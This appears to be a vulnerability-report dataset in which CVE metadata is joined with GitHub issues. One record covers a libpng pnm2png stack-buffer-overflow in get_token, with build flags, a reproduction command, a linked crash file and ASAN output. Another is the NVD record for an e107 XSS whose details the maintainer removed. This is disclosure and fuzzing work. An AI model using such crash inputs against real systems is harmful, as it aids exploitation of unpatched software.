+#ZLIB = -L../../../zlib -lz +#ZLIBS = ../../../zlib/libz.a CPPFLAGS=$(PNGINC) $(ZINC) -CFLAGS= +CFLAGS=-g -fsanitize=address +LDFLAGS=-fsanitize=address LDLIBS=$(PNGLIB) $(ZLIB) LDLIBSS=$(PNGLIBS) $(ZLIBS) C=.c @@ -41,19 +42,19 @@ png2pnm$(O): png2pnm$(C) $(CC) -c $(CPPFLAGS) $(CFLAGS) png2pnm$(C) png2pnm$(E): png2pnm$(O) - $(LD) $(LDFLAGS) -o png2pnm$(E) png2pnm$(O) $(LDLIBS) -lm + $(LD) $(LDFLAGS) -o png2pnm$(E) png2pnm$(O) $(LDLIBS) -lm -lz png2pnm-static$(E): png2pnm$(O) - $(LD) $(LDFLAGS) -o png2pnm-static$(E) png2pnm$(O) $(LDLIBSS) -lm + $(LD) $(LDFLAGS) -o png2pnm-static$(E) png2pnm$(O) $(LDLIBSS) -lm -lz pnm2png$(O): pnm2png$(C) $(CC) -c $(CPPFLAGS) $(CFLAGS) pnm2png$(C) pnm2png$(E): pnm2png$(O) - $(LD) $(LDFLAGS) -o pnm2png$(E) pnm2png$(O) $(LDLIBS) -lm + $(LD) $(LDFLAGS) -o pnm2png$(E) pnm2png$(O) $(LDLIBS) -lm -lz pnm2png-static$(E): pnm2png$(O) - $(LD) $(LDFLAGS) -o pnm2png-static$(E) pnm2png$(O) $(LDLIBSS) -lm + $(LD) $(LDFLAGS) -o pnm2png-static$(E) pnm2png$(O) $(LDLIBSS) -lm -lz clean: $(RM) png2pnm$(O) ``` This [file](https://github.com/fouzhe/security/tree/master/libpng/crash_pnm2png_stack_buffer_overflow_get_token) can cause stack-buffer-overflow when using this command: ```shell ./pnm2png crash_pnm2png_stack_buffer_overflow_get_token 1.png ``` This is the ASAN information: ``` ================================================================= ==4664==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0475bdc0 at pc 0x00000051740a bp 0x7ffc0475bcb0 sp 0x7ffc0475bca8 WRITE of size 1 at 0x7ffc0475bdc0 thread T0 #0 0x517409 in get_token /home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png.c:564:14 #1 0x517409 in pnm2png /home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png.c:238 #2 0x5164e5 in main /home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png.c:159:7 #3 0x7f94071de82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x41a3e8 in _start (/home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png+0x41a3e8) Address 0x7ffc0475bdc0 is located in stack of thread T0 at offset 128 in frame #0 0x516c0f in pnm2png /home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png.c:205 This frame has 18 object(s): [32, 40) 'png_ptr' (line 206) [64, 72) 'info_ptr' (line 207) [96, 100) 'row_bytes' (line 211) [112, 128) 'type_token' (line 213) <== Memory access at offset 128 overflows this variable [144, 160) 'width_token' (line 214) [176, 192) 'height_token' (line 215) [208, 224) 'maxval_token' (line 216) [240, 244) 'color_type' (line 217) [256, 264) 'ul_width' (line 218) [288, 296) 'ul_alpha_width' (line 218) [320, 328) 'ul_height' (line 219) [352, 360) 'ul_alpha_height' (line 219) [384, 392) 'ul_maxval' (line 220) [416, 420) 'width' (line 221) [432, 436) 'height' (line 221) [448, 452) 'alpha_width' (line 222) [464, 468) 'alpha_height' (line 222) [480, 484) 'bit_depth' (line 224) HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fouzhe/my_fuzz/libpng_test/libpng/contrib/pngminus/pnm2png.c:564:14 in get_token Shadow bytes around the buggy address: 0x1000008e3760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000008e3770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000008e3780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000008e3790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000008e37a0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 =>0x1000008e37b0: 00 f2 f2 f2 04 f2 00 00[f2]f2 00 00 f2 f2 00 00 0x1000008e37c0: f2 f2 00 00 f2 f2 04 f2 00 f2 f2 f2 00 f2 f2 f2 0x1000008e37d0: 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 04 f2 04 f2 0x1000008e37e0: 04 f2 04 f2 04 f3 f3 f3 00 00 00 00 00 00 00 00 0x1000008e37f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000008e3800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4664==ABORTING ```
stack-buffer-overflow in pnm2png in function get_token
https://api.github.com/repos/pnggroup/libpng/issues/246/comments
7
2018-07-21T07:08:11Z
2019-06-04T07:03:20Z
https://github.com/pnggroup/libpng/issues/246
343,304,914
246
510
CVE-2018-11734
2019-07-10T18:15:10.723
In e107 v2.1.7, output without filtering results in XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3170" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:e107:e107:2.1.7:*:*:*:*:*:*:*", "matchCriteriaId": "DBCF2D98-CD7A-4675-8A7F-D60C17B82CFB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/e107inc/e107/issues/3170
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "e107inc", "e107" ]
[EDITED BY MOC] Thank you your report. In the future, please report security issues by email to security@e107.org, instead of posting them here in public. I have removed the contents here to prevent abuse, and I have forwarded your report to security@e107.org. [EDITED BY MOC]
[EDITED BY MOC]
https://api.github.com/repos/e107inc/e107/issues/3170/comments
12
2018-06-04T04:45:19Z
2021-11-12T09:20:19Z
https://github.com/e107inc/e107/issues/3170
328,906,707
3,170
511